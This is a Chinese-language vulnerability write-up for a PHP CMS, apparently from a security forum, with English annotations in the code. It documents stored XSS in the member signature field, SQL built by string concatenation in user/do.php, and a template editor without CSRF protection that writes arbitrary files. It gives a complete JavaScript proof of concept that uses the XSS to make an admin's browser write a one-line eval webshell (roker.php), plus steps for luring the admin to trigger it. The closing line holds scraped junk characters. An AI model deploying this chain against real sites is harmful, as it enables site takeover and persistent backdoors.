这个 CMS 以前 90 有人发了个 getshell，当时是后台验证文件的问题。
官网已经修补了，所以重新下了源码。
因为后台登录还需要验证码，所以注入就没看了。不过下面 user/do.php 的 SQL 仍然是直接拼接变量（CS_Sex 甚至没加引号），如果没有全局转义，会员侧同样存在注入。
存在存储型 XSS（会员签名字段）。
漏洞文件：user/member/skin_edit.php
<?php /* Signature edit field. $cscms_qianm is echoed raw into the <textarea>: a stored
   signature containing "</textarea><script>..." closes the element and runs in the
   viewer's browser (stored XSS). Fix: echo htmlspecialchars($cscms_qianm, ENT_QUOTES, 'UTF-8').
   The same value is presumably also rendered on the public profile page (home/?uid=...)
   that the write-up uses as the trigger, so it must be escaped there as well. */ ?>
<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
</textarea></td></tr>
user/do.php
if($op=='zl'){ // "zl" (资料) = profile update for the logged-in member
    // Only presence is checked; nothing is escaped. CS_Sex and CS_Qianm are not checked at all.
    if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
        exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));

    // The UPDATE is built by string concatenation from the submitted fields; CS_Sex is
    // interpolated without quotes. Unless a global filter escapes these before this point
    // (not visible here), this is SQL injection in addition to being the stored-XSS sink:
    // CS_Qianm is saved verbatim and later echoed raw by skin_edit.php.
    // NOTE(review): $cscms_name selects the row to update. The capture below shows a
    // cs_name cookie; if $cscms_name is read from that cookie rather than a server-side
    // session, the target row is attacker-chosen — verify where it is set.
    $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
        CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
        where CS_Name='".$cscms_name."'";

    if($db->query($sql)){
        exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
    }else{
        exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
    }
}
写入（do.php）时没有过滤，输出（skin_edit.php）时也没有转义，于是产生存储型 XSS。
后台看了一下，很奇葩的是模板编辑功能（admin/skins/skins.php?ac=xgmb）可以写入任意扩展名的文件，目录还由 path 参数指定。
抓包如下（本地 127.0.0.1 测试环境，Cookie 为测试管理员账号；注意请求里没有任何 CSRF token）：
POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 127.0.0.1
Content-Length: 38
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594

name=aaa.php&content=%3Cs%3E%3Ca%25%3E
于是构造如下 JS：借助上面的存储型 XSS 在管理员浏览器里执行，对没有 CSRF 防护的后台写文件接口自动提交一个 POST 表单。
<script>
// CSRF proof of concept. It runs in the admin's browser (delivered through the stored
// signature XSS above) and auto-submits a POST to the template editor, whose request,
// per the capture above, carries no CSRF token and accepts an arbitrary file name.
// The target host is taken from the page the admin is viewing, so nothing is hard-coded.
thisTHost = top.location.hostname; // implicit global, as in the original
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";

// Builds a hidden form with fields `name` (= data) and `content` (= msg), appends it
// to the document and submits it to url. The parameter names are misleading: `data`
// becomes the file name, `msg` becomes the file body. Submitting navigates the admin's
// tab to the response, so the action is not invisible to them.
function PostSubmit(url, data, msg) {
    var postUrl = url;
    var postData = data;
    var msgData = msg;
    var ExportForm = document.createElement("FORM");
    document.body.appendChild(ExportForm);
    ExportForm.method = "POST";
    var newElement = document.createElement("input");
    newElement.setAttribute("name", "name");
    newElement.setAttribute("type", "hidden");
    var newElement2 = document.createElement("input");
    newElement2.setAttribute("name", "content");
    newElement2.setAttribute("type", "hidden");
    ExportForm.appendChild(newElement);
    ExportForm.appendChild(newElement2);
    newElement.value = postData;
    newElement2.value = msgData;
    ExportForm.action = postUrl;
    ExportForm.submit();
};

// Writes roker.php (a one-line eval backdoor) into skins/index/html/ via the admin's session.
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
</script>
在 http://127.0.0.1/user/space.php?ac=edit&op=zl 的修改签名处插入上面的脚本。
用你的账号给管理员写个私信，或者让他访问你的主页 http://127.0.0.1/home/?uid=2（uid 改成自己的）。
2 L7 z2 Q* v0 Z* y7 _% L就会 在 skins\index\html\目录下生成 roker.php 一句话。 | " r/ G8 M9 w) w0 @3 D